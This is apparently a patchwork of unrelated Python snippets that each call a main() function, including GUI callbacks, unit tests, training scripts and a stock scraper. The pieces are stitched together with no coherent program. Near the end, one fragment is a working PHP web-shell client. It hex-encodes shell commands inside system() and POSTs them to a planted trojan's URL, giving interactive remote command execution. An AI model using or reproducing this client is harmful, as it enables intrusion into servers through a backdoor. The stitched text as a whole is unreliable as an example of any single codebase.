def openf(self, event): l = self.openfile.GetValue() k = self.text1.GetValue() if self.radio1.GetValue(): text = 1 elif self.radio2.GetValue(): text = 2 else: text = 3 import os if os.path.exists(l) and l and k and k.isdigit() and int(k) >=0 and text: file = open(l) pts = [] for line in file.readlines(): line = line.split() pts.append(( int(line[0]), int(line[1]))) file.close() if len(pts) >= int(k): main.main( l, int(k),text) else: box = wx.MessageDialog(None, 'your k is bigger than the num of pts!', 'wrong', wx.OK) if box.ShowModal() == wx.ID_OK: box.Destroy() self.text1.Clear() else: box = wx.MessageDialog(None, 'you miss a file or write a wrong k', 'wrong', wx.OK) if box.ShowModal() == wx.ID_OK: box.Destroy() self.openfile.Clear() self.text1.Clear()
def run_main(): """\ This main procedure is started by calling either wxglade.py or wxglade.pyw on windows """ # prepend the widgets dir to the # app's search path wxglade_path = determine_wxglade_path() #sys.path = [os.getcwd(), os.path.join(os.getcwd(), 'widgets')] + sys.path sys.path = [wxglade_path, os.path.join(wxglade_path, 'widgets')] + sys.path # set the program's path import common common.wxglade_path = wxglade_path #os.getcwd() # before running the GUI, let's see if there are command line options for # code generation if len(sys.argv) == 1: # if there was no option, start the app in GUI mode import main main.main() else: options, args = parse_command_line() if not options: # start the app in GUI mode, opening the given file filename = _fix_path(args[0]) import main main.main(filename) else: command_line_code_generation(options, args)
def entry(isPublic, isSelectable, threadNum): log_utils.info("Curr Python Version::%s", config_utils.get_py_version()) print(u"**********所有游戏**********") print(u"\t appID \t\t 游戏文件夹 \t\t 游戏名称 \n\n") games = config_utils.getAllGames() if games != None and len(games) > 0: for ch in games: print(u"\t %s \t\t %s \t\t\t%s" % (ch['appID'], ch['appName'], ch['appDesc'])) sys.stdout.write(u"请选择一个游戏(输入appID):") sys.stdout.flush() selectedGameID = raw_input() selectedGameID = str(selectedGameID) game = getGameByAppID(selectedGameID, games) log_utils.info("current selected game is %s(%s)", game['appName'], game['appDesc']) if isSelectable: main.main(game, isPublic) else: main_thread.main(game, isPublic, threadNum)
def batch_incremental(): load_experiments("experiments_ref") for base_steps in xrange (2,4): for uav_count in xrange(1,11): if base_steps * uav_count < 3: continue for num_steps in xrange(2,5): experiment = find_experiment([("num_receivers",uav_count),("receiver_step_count",2)]) if experiment is None: print "Error experiment not found" exit(1) best_pheno = experiment.get_phenome(100, 0, "FITNESS",True) base_pheno_decoded_positions = best_pheno['decoded_positions'] base_pheno_list = [] for position in base_pheno_decoded_positions: base_pheno_list.append(" ".join(map(str,position))) base_pheno_str = ",".join(base_pheno_list) config_parameters = [] config_parameters.append((GENOTYPE_SECTION, "base_pheno", base_pheno_str)) config_parameters.append((GLOBAL_SECTION, "num_receivers", str(uav_count))) config_parameters.append((GENOTYPE_SECTION, "receiver_step_count", str(num_steps))) population_size = max(40,uav_count*num_steps*20) config_parameters.append((GLOBAL_SECTION, "population_size", str(population_size))) main("./configs/PathIncr.ini", config_parameters)
def commandline_call(): """ Entry point of the program when called from the command line """ options, args = parse_options(sys.argv[1:]) if not len(args)==1: if len(args)==0: option_parser.print_help() else: print >> sys.stderr, "1 argument: input file" sys.exit(1) import time t1 = time.time() if args[0] == "-": pyfile = sys.stdin else: pyfile = open(args[0],"r") # fix include path from os.path import dirname, abspath path_of_pyfile = dirname(abspath(args[0])) sys.path.insert(0, path_of_pyfile) print sys.path # Store the name of the input file for later use options.update({'infilename':args[0]}) main(pyfile, overrides=options) # FIXME: wath about the options defined in the script: options.quiet if not 'quiet' in options: print >>sys.stderr, "Ran script in %.2fs" % (time.time() - t1)
def start_module(): options = ["- Print default records", "- Add new record", "- Remove record by id", "- Update record by id", "- Avalible tools", "- Get average durability"] ui.print_menu("\nTool Manager\n", options, "0: Return to main menu\n") inputs = ui.get_inputs("Please enter a number: ", "") option = inputs[0] try: if option == "1": show_table(table) elif option == "2": add(table) elif option == "3": id_ = ui.get_inputs("Enter what you want to delete:", "") remove(table, id_) elif option == "4": id_ = ui.get_inputs("Enter what you want to update(id):", "") update(table, id_) elif option == "5": get_available_tools(table) elif option == "6": get_average_durability_by_manufacturers(table) elif option == "0": main.main() else: raise KeyError("There is no such option.") except KeyError as err: ui.print_error_message(err) pass
def test_obama_example(capsys): main.main(os.path.join(RESOURCES, 'obama_wikipedia.txt')) stdout, _ = capsys.readouterr() lines = stdout.split('\n') assert re.match( r'.*Obama\b.*\| received\b.*\| national attention\b', lines[1])
def start_module(): ui.print_menu("Human Resources", ["show", "add", "remove", "update", "oldest", "average"], "0 exit") inputs = ui.get_inputs(["Please enter a number: "], "") option = inputs[0] table = data_manager.get_table_from_file("hr/persons.csv") try: if option == "1": show_table(table) elif option == "2": add(table) elif option == "3": id_ = ui.get_inputs("Enter the item/'s id you want to remove:","") remove(table, id_) elif option == "4": id_ = ui.get_inputs("Enter the item/'s id you want to update:","") update(table, id_) elif option == "5": get_oldest_person(table) elif option == "6": get_persons_closest_to_average(table) elif option == "0": main.main() else: raise KeyError except KeyError: ui.print_error_message("There is no such option, choose from given numbers.") start_module() pass
def testSourceExtractReturnsCorrectNumberOfFiles(self): dt = datetime.date.today() - datetime.timedelta(days=1) games = main.chooseGames(dt) main.main(dt) game_files = [f for f in os.listdir(constants.LOGDIR_SOURCE) if f[:10] == dt.isoformat()] self.assertEqual(len(games) * 2,len(game_files))
def test_configurations(self): for config_file in dir_explore("configurations"): args = [ 'main.py', '-f', config_file, '-n', '2', '-p', False ] sys.argv = args main.main()
def test_obama_example(resource, capsys): main.main(resource('obama_wikipedia.txt')) stdout, _ = capsys.readouterr() lines = stdout.split('\n') assert re.match( r'.*Obama\b.*\| received\b.*\| national attention\b', lines[1])
def test_master_args_correctly_create_cluster_master(self): mock_cluster_master = self.mock_ClusterMaster.return_value # get the mock for the ClusterMaster instance main.main(['master']) self.mock_ClusterMaster.assert_called_once_with() # assert on constructor params self.mock_ClusterMasterApplication.assert_called_once_with(mock_cluster_master) # assert on constructor params
def call_analyze_seq(self): seq_len = int(self.an_seq_len.text()) to_analyze = {} to_analyze['probabilities'] = self.probs.isChecked() to_analyze['cond_probabilities'] = self.cond_probs.isChecked() to_analyze['cond_entropy'] = self.cond_entropy.isChecked() to_analyze['autocorrelation'] = self.autocorr.isChecked() to_analyze['kld'] = self.kld.isChecked() to_analyze['l1metric'] = self.l1m.isChecked() other_params = {} other_params['L'] = int(self.probs_l.text()) other_params['upto'] = int(self.autocorr_upto.text()) other_params['K'] = int(self.kld_l.text()) - 1 other_params['l1'] = int(self.l1m_upto.text()) - 1 params = {} params['to_analyze'] = to_analyze params['other_params'] = other_params p = 'configs/' + self.configs['graph_path'] + '/params.yaml' with open(p, 'w') as f: yaml.dump(params, f) self.analyze_bar.value = 0 mn.main(self.config_file_path, an_seq=True, seq_len=seq_len, tag=self.config_tag) self.analyze_bar.value = 100
def batch_vardev(): conf = load_config("VarDevConf") try: main(conf) except: print traceback.format_exc()
def Notify(self, event): if event == "PlayAgain": self.keepGoing = False gc.collect() main.main() elif event == "QuitEvent": self.keepGoing = False
def button_action (self, coord): if self.type == "barrier": if self.start_coord is None: self.start_coord = coord else: if self.special_klicked: self.board.delete_barrier_line (self.start_coord, coord) else: self.board.new_barrier_line_set (self.start_coord, coord) self.start_coord = coord elif self.type == "new": # rectangel coords are bizarr; maybe should be thought about later fac = 1 if self.size == "big": fac *= 2 if self.rect.left < coord[0] < self.rect.right*2: if self.rect.bottom < coord[1] < self.rect.bottom +60*fac/2: main.main(size= "small") sys.exit(1) elif self.rect.bottom +60*fac/2 <= coord[1] < self.rect.bottom+60*fac: main.main(size= "big") sys.exit(1) elif self.type == "anthill_big": self.board.board [coord[0]] [coord[1]] .set_colony(30) elif self.type == "anthill_small": self.board.board [coord[0]] [coord[1]] .set_colony(10) elif self.type == "food_big": self.board.board [coord[0]] [coord[1]] .set_food(2500) elif self.type == "food_small": self.board.board [coord[0]] [coord[1]] .set_food(500)
def test_main(self, isAlive_mock, parse_args_mock, join_mock, start_mock, Controller_init_mock, try_to_connect_mock, update_log_level_mock, write_pid_mock, perform_prestart_checks_mock, update_config_from_file_mock, bind_signal_handlers_mock, setup_logging_mock): Controller_init_mock.return_value = None isAlive_mock.return_value = False options = MagicMock() parse_args_mock.return_value = (options, MagicMock) tmpdir = tempfile.gettempdir() #testing call without command-line arguments os.environ["AGENT_WORK_ROOT"] = os.path.join(tmpdir, "work") os.environ["AGENT_LOG_ROOT"] = ",".join([os.path.join(tmpdir, "log"),os.path.join(tmpdir, "log2")]) main.main() self.assertTrue(setup_logging_mock.called) self.assertTrue(bind_signal_handlers_mock.called) self.assertTrue(update_config_from_file_mock.called) self.assertTrue(perform_prestart_checks_mock.called) self.assertTrue(write_pid_mock.called) self.assertTrue(update_log_level_mock.called) self.assertTrue(options.log_folder == os.path.join(tmpdir, "log")) try_to_connect_mock.assert_called_once_with(ANY, -1, ANY) self.assertTrue(start_mock.called)
def test_single_machine_case_runs_master_and_slave(self): mock_service_runner = self.mock_ServiceRunner.return_value build_args = ['build'] main.main(build_args) self.assertTrue(mock_service_runner.run_master.called) self.assertTrue(mock_service_runner.run_slave.called)
def test_tictactoe_medium(self): config_file = "configurations/tictactoe.yml" args = [ 'main.py', '-f', config_file, '-n', 'medium', '-p', False ] sys.argv = args main.main()
def form(): envelope = simplejson.loads(request.form.get('envelope')) from_address = envelope['from'] print from_address text = request.form.get('text') print text main.main(text, "C:/Users/Atanas/Desktop/PythonBackEnd/emails/", from_address) return "OK"
def test_start_app_force_kill_countdown_is_called_when_app_exits_via_unhandled_exception(self): run_mock = self.patch('main.MasterSubcommand').return_value.run run_mock.side_effect = Exception('I am here to trigger teardown handlers!') with self.assertRaises(SystemExit, msg='UnhandledExceptionHandler should convert Exception to SystemExit.'): main.main(['master']) self.start_force_kill_countdown_mock.assert_called_once_with(seconds=AnythingOfType(int))
def test_configuration_default(self): config_file = "configurations/default.yml" for game in main.games: args = [ 'main.py', '-f', config_file, '-g', game, '-n', '2', '-p', False ] sys.argv = args main.main()
def test_main_calls_add_item_once_with_error_for_all_jobs_none_returned(self, all_jobs): self.workflow.args = ['all'] self.workflow.settings = {'jenkins_url': 'http://some-url:8080'} all_jobs.side_effect = NoJobsFound main(self.workflow) self.workflow.add_item.assert_called_once_with("Error: No jobs found") self.workflow.send_feedback.assert_called_once()
def init(Screen): from main import main curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK) curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_BLACK) curses.curs_set(0) veridis = Veridis() veridis.settings.tasks = veridis.settings.readsettings("data/tasks", veridis) veridis.settings.schedule = veridis.settings.readsettings("data/schedule", veridis) main(Screen, veridis)
def processArguments(): '''init process arguments ''' parser = OptionParser(usage="Usage: deepin-screenshot [options] [arg]", version="deepin-screenshot v2.1") parser.add_option("-f", "--full", action="store_true", dest="fullscreen", help=_("Take a screenshot of full screen")) parser.add_option("-w", "--window", action="store_true", dest="window", help=_("Take a screenshot of the window")) parser.add_option("-d", "--delay", dest="delay", type="int", help=_("Take a screenshot after NUM seconds"), metavar="NUM") parser.add_option("-s", "--save", dest="save_file", help=_("save screenshot to FILE"), metavar="FILE") parser.add_option("--sub", action="store_true", dest="sub", help=_("run as a subprocess")) parser.add_option("-n", "--new", action="store_true", dest="new", help=_("run a new process")) parser.add_option("-I", "--icon", action="store_true", dest="icon") #parser.add_option("-a", "--area", help="Grab an area of the screen instead of the entire screen", action="store_true") #parser.add_option("-e", "--border-effect", action="store_true", dest="border_effect", help="Effect to add to the border") #parser.add_option("-i", "--interactive", action="store_true", help="Interactively set options") #parser.add_option("-b", "--include-border", action="store_true", help="Include the window border with the screenshot") #parser.add_option("-B", "--remove-border", action="store_true", help="Remove the window border from the screenshot") #parser.add_option("-c", "--clipboard", help="Send the grab directly to the clipboard", action="store_true") parser.get_option('-h').help = _("show this help message and exit") parser.get_option('--version').help = _("show program's version number and exit") import sys if '-h' in sys.argv or '--help' in sys.argv: parser.remove_option("-I") (options, args) = parser.parse_args() if not options.new and IS_EXISTS: print "deepint-screenshot has run" exit(1) if options.fullscreen and options.window: parser.error("options -f and -w are mutually exclusive") config.OPTION_ICON = options.icon config.OPTION_FULLSCREEN = options.fullscreen config.OPTION_WINDOWN = options.window config.OPTION_NEW = options.new config.OPTION_FILE = options.save_file config.OPTION_SUB = options.sub if options.delay: notify("Deepin Screenshot", 0, summary=_("DScreenshot"), body=_("Deepin Screenshot will start in %d seconds.") % options.delay, timeout=(options.delay-0.5)*1000) loop = gobject.MainLoop() gobject.timeout_add_seconds(options.delay, loop.quit) loop.run() if options.save_file: parserFile = parser_path(str(options.save_file)) if options.fullscreen: pixbuf = get_screenshot_pixbuf(True) pixbuf.save(parserFile[0], parserFile[1]) elif options.window: pixbuf = get_screenshot_pixbuf(False) pixbuf.save(parserFile[0], parserFile[1]) else: main() elif options.fullscreen: open_file_dialog() elif options.window: open_file_dialog(False) else: main()
def test_fetch_questions_without_previous_data(mk_execute): """测试数据库中没有数据的情况""" import main mk_execute.return_value = None tid = test_tid class MockQuestion: """ Act as QuestionManager and zhihu.Question """ def __init__(self, url, id, creation_time, title, author=''): self._url = self.url = url self.id = id self.creation_time = self.time = creation_time self.title = title self.author = self.asker = author self._session = Mock() self.deleted = False self.follower_num = 0 self.author = Mock(id='asker') self.topics = ['互联网'] t = datetime.now() mock_question1 = MockQuestion('http://q/1', '1', t+timedelta(1), 'question1') mock_question2 = MockQuestion('http://q/2', '2', t+timedelta(2), 'question2') mock_question3 = MockQuestion('http://q/3', '3', t+timedelta(3), 'question3') mock_question4 = MockQuestion('http://q/4', '4', t+timedelta(4), 'question4') with patch('zhihu.Topic.questions', new_callable=PropertyMock) as mock_q: mock_q.side_effect = [ [mock_question1], [mock_question2, mock_question1], [mock_question2, mock_question1], [mock_question4, mock_question3, mock_question2, mock_question1], [mock_question4, mock_question3, mock_question2, mock_question1] ] def test(): time.sleep(1) if mock_q.call_count == 1: assert len(QuestionManager.get_all_questions_one_topic(tid))==0 if mock_q.call_count == 2: questions = QuestionManager.get_all_questions_one_topic(tid) assert questions[0]['qid'] == '2' if mock_q.call_count == 3: questions = QuestionManager.get_all_questions_one_topic(tid) assert questions[0]['qid'] == '2' if mock_q.call_count == 4: questions = QuestionManager.get_all_questions_one_topic(tid) questions.sort(key=lambda x: x['qid']) assert questions[0]['qid'] == '2' assert questions[1]['qid'] == '3' assert questions[2]['qid'] == '4' raise EndProgramException main.main(postroutine=test)
def test_correlate(mock_correlate_handler): sys.argv = shlex.split('program correlate 1111') main.main() assert_true(mock_correlate_handler.called) mock_correlate_handler.assert_called_once_with( argparse.Namespace( func=main.handle_correlate, log_level=21, project_number='1111'))
def test_main(self): from main import main class ParsedArgs: verbose = True attrib = [] path = '.' update = True silent = False main(ParsedArgs())
def handle(self): if sys.argv[-1] == "tls": sock = ssl.wrap_socket(self.request, certfile=settings["certfile"], server_side=True, ciphers=settings["sslciphers"]) else: sock = self.request main.main(sock) sock.shutdown(socket.SHUT_RDWR) sock.close()
def test_valid_directory(self, mock_subprocess_run): mock_subprocess_run.return_value.stdout = True directory = os.path.join(resources_directory, "test_directory") output_directory = os.path.join(directory, 'output') puc.main(directory, output_directory) self.assertTrue(os.path.isdir(output_directory)) # cleanup os.rmdir(output_directory)
def test_song_794_length(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][795]["love"], 0.2222222222222222)
fuel = Region([circle], [-1], uid=1, mat='fuel', phi=fuelphiguess) regions = [moderator, fuel] n_rays = 100 # k, regions = main(n_rays, surfaces, regions, pitch, ngroup, plot=False) # Ray Length sensitivity analysis ks_ray_length = [] lengths = [] for i in range(100): try: cutoff = 300 * i / 100 + 1 k, regions_trash = main(n_rays, surfaces, copy.deepcopy(regions), pitch, ngroup, cutoff_length=cutoff, deadzone=0) lengths.append(cutoff) ks_ray_length.append(k) except: print('oh well') data = np.vstack((lengths, ks_ray_length)).T np.savetxt('./sensitivity/cutoff_length_sensitivity_data', data) ks_dead_zone = [] lengths = [] # Dead zone sensitivity analysis for i in range(50): try:
h5_util.write_list(f, 'xdirection', norm_dx) h5_util.write_list(f, 'ydirection', norm_dy) f.close() if 'norm' in model_path: pre_mode = 'norm' elif 'scale' in model_path: pre_mode = 'scale' else: raise Exception('Unknown pre_mode!') for loss_key, dot_num in zip(loss_key_list, dot_num_list): main(model_type, model_path, batch_size=batch_size, dataset=dataset, load_mode=load_mode, L_A=L_A, L_W=L_W, pre_mode=pre_mode, add_aug=add_aug, aug_pol=aug_pol, l2_reg_rate=l2_reg_rate, fc_type=fc_type, dir_path=dir_path, fig_type=fig_type, dot_num=dot_num, l_range=l_range, loss_key=loss_key, add_reg=add_reg)
def test_song_999_id(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][1000]["id"], "999")
def test_song_256_title(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][257]["title"], "Ai Mouraria")
def test_song_574_love(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][575]["love"], 0.11111111111111105)
def get(self): # 申请锁 for root, dirs, files in os.walk(dir_run): for fname in files: fpname = os.path.join(root, fname) if fpname.endswith('.lock'): self.write('Busy') return break file_lock = os.path.join(dir_run, str(os.getpid()) + ".lock") open(file_lock, 'w').close() time.sleep(1) count = 0 for root, dirs, files in os.walk(dir_run): for fname in files: fpname = os.path.join(root, fname) if fpname.endswith('.lock'): count += 1 break if count >= 2: self.write('Busy') os.remove(file_lock) return ######## uu = uuid.uuid4() flog = open(file_log, 'a') msg = "%s\t%s\t%s\t%s\t%s- Start training.\n" % (time.asctime( time.localtime()), self.request.remote_ip, self.request.method, self.request.uri, uu) flog.write(msg) flog.close() if os.path.exists(file_middle): try: main.main('train.txt', 'train', 'prepareTrain', False) self.write("OK") flog = open(file_log, 'a') msg = "%s\t%s\t%s\t%s\t%s- OK.\n" % ( time.asctime(time.localtime()), self.request.remote_ip, self.request.method, self.request.uri, uu) flog.write(msg) flog.close() except: self.write("Error\n语料解析错误。") flog = open(file_log, 'a') msg = "%s\t%s\t%s\t%s\t%s- Error.语料解析错误。\n" % ( time.asctime(time.localtime()), self.request.remote_ip, self.request.method, self.request.uri, uu) flog.write(msg) flog.close() else: self.write("Error\n没有待训练的语料文件。") flog = open(file_log, 'a') msg = "%s\t%s\t%s\t%s\t%s- Error.没有待训练的语料文件。\n" % ( time.asctime(time.localtime()), self.request.remote_ip, self.request.method, self.request.uri, uu) flog.write(msg) flog.close() # 释放锁 os.remove(file_lock) return
# net hyper net_hyper = dict(use_case=hset['use_case'], case_lookup_size=hset['case_lookup_size'], case_embedding_size=hset['case_embedding_size'], drop_prob=hset['drop_prob'], hidden_size=hset['hidden_size'], layer_num=hset['layer_num'], is_bidirection=hset['is_bidirection'], twice_embedding_size=hset['twice_embedding_size'], class_num=hset['class_num']) # fit hyper fit_hyper = dict(batch_size=hset['batch_size'], learning_rate=hset['learning_rate'], weight_decay=hset['weight_decay'], balance_weight=hset['balance_weight'], o_index=hset['o_index'], class_num=hset['class_num'], patience=hset['patience'], epoch_num=hset['epoch_num'], is_topk=False, is_formal=hset['is_formal']) # record folder record_folder = record_root + str(i_hset) + '/' main(dataset_folder, net_hyper, fit_hyper, record_folder) with open(record_root + 'hypersets.json', 'w') as f: json.dump(hypersets, f)
if __name__ == "__main__": model_name = "BertOrigin" data_dir = "/search/hadoop02/suanfa/songyingxin/data/cnews" output_dir = ".cnews_output" cache_dir = ".cnews_cache" log_dir = ".cnews_log" model_times = "model_1/" # 第几次保存的模型,主要是用来获取多次最佳结果 bert_vocab_file = "/search/hadoop02/suanfa/songyingxin/pytorch_Bert/bert-base-chinese-vocab.txt" # 需改 bert_model_dir = "/search/hadoop02/suanfa/songyingxin/pytorch_Bert/bert-base-chinese" from Processors.NewsProcessor import NewsProcessor if model_name == "BertOrigin": from BertOrigin import args elif model_name == "BertCNN": from BertCNN import args elif model_name == "BertATT": from BertATT import args elif model_name == "BertRCNN": from BertRCNN import args main( args.get_args(data_dir, output_dir, cache_dir, bert_vocab_file, bert_model_dir, log_dir), model_times, NewsProcessor)
# Bootstrap to the main module if __name__ == '__main__': from main import main main()
def process_validation_data(): depth_path = 'F:/Image_Perspective/data/nyu_datasets_changed/target_depths/' img_path = 'F:/Image_Perspective/data/nyu_datasets_changed/input/' label_path = 'F:/Image_Perspective/data/nyu_datasets_changed/labels_38/' #im_num = 910 min_im_num = 295 max_im_num = 1448 for im_num in range(min_im_num, max_im_num): im_name = (5 - len(str(im_num))) * '0' + str(im_num) depth = cv2.imread(depth_path + im_name + '.png') img = cv2.imread(img_path + im_name + '.jpg') labels = cv2.imread(label_path + im_name + '.png')[:, :, 0] floor_label = 2 floor = (labels == floor_label).astype(int) num_floor_pixels = floor.sum() tot_pixels = labels.shape[0] * labels.shape[1] pct_floor = num_floor_pixels / tot_pixels * 100 save_filepath = 'F:/Insight/SpaceAce/Validation/' floor_thresh = 20 if pct_floor > floor_thresh: save_labeled = save_filepath + 'labeled_images/' + im_name + '.npy' save_processed = save_filepath + 'processed/' + im_name + '/' save_img = save_filepath + 'rgb_images/' + im_name + '.npy' save_target_depth = save_filepath + 'target_depths/' + im_name + '.npy' save_target_labels = save_filepath + 'target_labels/' + im_name + '.npy' try: main(img_path + im_name + '.jpg', save_processed) except: None np.save(save_labeled, labels) np.save(save_img, img) np.save(save_target_depth, depth) np.save(save_target_labels, floor) fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2) ax1.imshow(img) ax1.axis('off') ax1.set_title('original') ax2.imshow(labels) ax2.axis('off') ax2.set_title('labeled') ax3.imshow(depth) ax3.axis('off') ax3.set_title('depth') ax4.imshow(floor) ax4.axis('off') ax4.set_title('floor') fig.suptitle('Image ' + im_name + '\n({:.0f}% floor)'.format(pct_floor)) plt.savefig(save_processed + '_targets.jpg', dpi=199) return None
def parse(run, draw=True): sql = """SELECT * FROM my_list""" results = database.select(sql) if results: i = 1 while i <= run: day = datetime.datetime.today().weekday() time_now = datetime.datetime.now() morning = time_now.replace(hour=9, minute=00) evening = time_now.replace(hour=18, minute=40) if morning < time_now < evening and day != 5 and day != 6: datetime_now = datetime.datetime.now().strftime( "%Y/%m/%d %H:%M:%S") if draw: print() print("--- {t} ---".format(t=datetime_now)) print() for result in results: url = "https://www.boursorama.com/cours/" + result[2] req = requests.get(url) soup = BeautifulSoup(req.content, 'html.parser') name = soup.find( class_="c-faceplate__company-link").text.replace( " ", "").replace("\n", "") value = soup.find_all( 'span', class_="c-instrument c-instrument--last")[0].text var = soup.find_all( 'span', class_="c-instrument c-instrument--variation")[0].text volume = soup.find_all( 'span', class_="c-instrument c-instrument--totalvolume" )[0].text.replace(" ", "") vol_var = soup.find_all( 'li', class_="c-list-info__item--small-gutter")[2] vol_var = vol_var.text.replace(" ", "").split("\n")[3] dividend_date = soup.find_all( 'li', class_= "c-list-info__item c-list-info__item--fixed-width")[1] dividend_date = dividend_date.text.replace( " ", "").split("\n")[3].split(".") dividend_date = "20{}-{}-{}".format( dividend_date[2], dividend_date[1], dividend_date[0]) value_div = [] value_div_20 = soup.find( 'li', class_= "c-list-info__item c-list-info__item--fixed-width") value_div_20 = value_div_20.text.replace(" ", "").split("\n")[3] company_id = result[0] if value_div_20 == "-": value_div_20 = soup.find( 'td', class_= "c-table__cell c-table__cell--dotted c-table__cell--inherit-height" " c-table__cell--align-top / u-text-left u-text-right u-ellipsis" ) value_div.append( value_div_20.text.replace(" ", "").replace( "\n", "").replace("EUR", "")) else: value_div.append(value_div_20.replace("EUR", "")) nb = 1 while nb <= 5: value_div_other = soup.find_all( 'td', class_= "c-table__cell c-table__cell--dotted c-table__cell--inherit-height" " c-table__cell--align-top / u-text-left u-text-right u-ellipsis" )[nb] value_div.append( value_div_other.text.replace(" ", "").replace( "\n", "").replace("EUR", "")) nb += 1 company(company_id, value, var, volume, vol_var, datetime_now) interest(company_id, value_div, dividend_date, datetime_now) if draw: print( "\t\t{n}\nAction: {val}€\t{var}\nVolume: {vo}\t{vov}\nDividende: {vd}€\t{vp}" .format(n=name, val=value, var=var, vo=volume, vov=vol_var, vd=value_div[0], vp=value_div[3])) print() if run > 1: time.sleep(60) else: if draw: print("\nBourse fermée\n") time.sleep(2) break i += 1 else: print("\nAucune Entreprise dans la liste") return "None" if draw: time.sleep(2) main.main()
def test_song_934_complex(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][935]["complexity"], 0.34463276836158196)
""" Для запуска из терминала: python -m music_tree -t 120 """ from sys import argv from main import main if __name__ == "__main__": main(argv)
def test_song_664_mood(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][665]["mood"], 0.36310853059401493)
'''add force''' self.force = self.force + force self.force = self.force * (1 / self.mass) def draw(self, screen): '''draw object''' screen.blit(self.surface, self.position.vec) def update(self, deltatime): '''update''' if self.Seek is True: self.add_force(self.seek(self.targetagent)) if self.Flee is True: self.add_force(self.flee(self.targetagent)) if self.Wander is True: self.add_force(self.wander(self.distance, self.radius)) self.acceleration = self.force self.heading = self.velocity.normalize self.velocity = self.heading * self.velocity.magnitude + self.acceleration * deltatime if self.velocity.magnitude > self.maxvelocity: self.velocity = self.velocity.normalize * self.maxvelocity self.position = self.position + self.velocity * deltatime if __name__ == '__main__': import main as Main Main.main()
def test_song_413_kid(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][414]["kid_safe"], 1.0)
def test_length(self): self.assertEqual(len(json.loads(main.main('Lyrics'))["characterizations"]),1001)
def test_song_112_artist(self): self.assertEqual(json.loads(main.main('Lyrics'))["characterizations"][113]["artist"], "Sub Focus")
import sys sys.path.insert(0, '../') from main import main OWL_ALBUMS = ['Ocean Eyes', 'The Midsummer Station', 'Mobile Orchestra'] NAME = 'Owl City' main(NAME, OWL_ALBUMS)
#!/usr/bin/env python3 import os import sys sys.path.append("src") os.chdir(os.path.dirname(os.path.realpath(__file__))) import main main.main()
#! /usr/bin/env python # -*- coding: utf-8 -*- from main import main main(revisions=["issue549-base", "issue549-v1"])
def test_type_dict(self): self.assertEqual(type(json.loads(main.main('Lyrics'))["characterizations"][0]),dict)
try: content='' cmd=raw_input(GREEN+'PHP_Shell>'+END) while(cmp(cmd,"q")): if cmd != "": content = 'system'+'('+'"'+cmd+'"'+');' content = binascii.b2a_hex(content) postdata = urllib.urlencode({ password:content}) req = urllib2.Request( url = url, #木马url地址 data = postdata, headers = headers ) response = urllib2.urlopen(req).read() print response cmd = raw_input(GREEN+'PHP_Shell>'+END) else: cmd = raw_input(GREEN+'PHP_Shell>'+END) except Exception,e: print e def exploit(self): self.payloads() #下面为单框架程序执行,可以省略 if __name__ == '__main__': from main import main main(PLScan())
def test_json(self): self.assertEqual(type(main.main('Lyrics')),str)
# h, w = (d2.shape[0], d2.shape[1]) # new_height = 400 # new_width = round( new_height/h*w ) # d2 = cv2.resize( d2, (new_width,new_height)) # # st.image(d2) # ============================================================================= # ============================================================================= # Process image # ============================================================================= try: d = main( img_filepath = create_filepath(im_name, 'original', type = 'file' ), save_filepath = create_filepath(im_name), ) except: 'Sorry, an unexpected error occured.' overlay_image = cv2.imread( create_filepath(im_name, 'depth_overlay', type = 'file') ) overlay_image = cv2.resize( overlay_image, (round(new_width*1.2),round(new_height*1.2))) st.image(overlay_image) # ============================================================================= # Load processed image # ============================================================================= image_depth = cv2.imread( create_filepath(im_name, 'depthimage2', type = 'file') ) #image_depth = cv2.resize( image_depth, (new_width,new_height)) #overlay_image = cv2.imread( create_filepath(im_name, 'depth_overlay', type = 'file') ) #overlay_image = cv2.resize( overlay_image, (round(new_width*1.2),round(new_height*1.2)))
p_choice = 1 # int(input('[1] n queens \t [2] map filling')) print('choose the algorithm') s_choice = 1 #int(input('[1] backtrack \t [2] forward')) if p_choice == 1: """n_queens""" variables = ['Q' + str(i) for i in range(8)] domain = list(range(1, 9)) result = [0] * 8 p = csp(domain, variables, result, p_choice) if s_choice == 1: if not p.backtrack_solve(0): print('there\'s no solution') p.print_solution(8) main_program.main(p.final_result) elif s_choice == 2: forward_domain = [] for i in range(8): forward_domain.append(list(range(1, 9))) if not p.forward_solve(forward_domain, 0): print('THERE\'S NO SOLUTION') p.print_solution(8) elif p_choice == 2: """map filling""" variables = ['WA', 'NT', 'Q', 'NSW', 'V', 'SA', 'T'] domain = ['R', 'G', 'B'] result = [0] * 7
from main import main if __name__ == '__main__': main(mode=1)
font='Helvetica 26 bold', relief="ridge") Label2.config(height=2, width=100) Label2.grid(row=0, column=0) Label2.pack(fill=X, padx=30, pady=10) separator = Frame(height=2, bd=1, relief=SUNKEN) separator.pack(fill=X, padx=30, pady=10) Button2 = Button(Bottomframe, text="Open File", command=openfile) Button2.grid(row=10, column=10) Button2.pack(side=BOTTOM) w = 1000 h = 420 ws = root.winfo_screenwidth() hs = root.winfo_screenheight() x = (ws / 2) - (w / 2) y = (hs / 2) - (h / 2) root.geometry('%dx%d+%d+%d' % (w, h, x, y)) root.mainloop() if __name__ == '__main__': if len(sys.argv) > 1: main.main(sys.argv[1], sys.argv[2]) process()
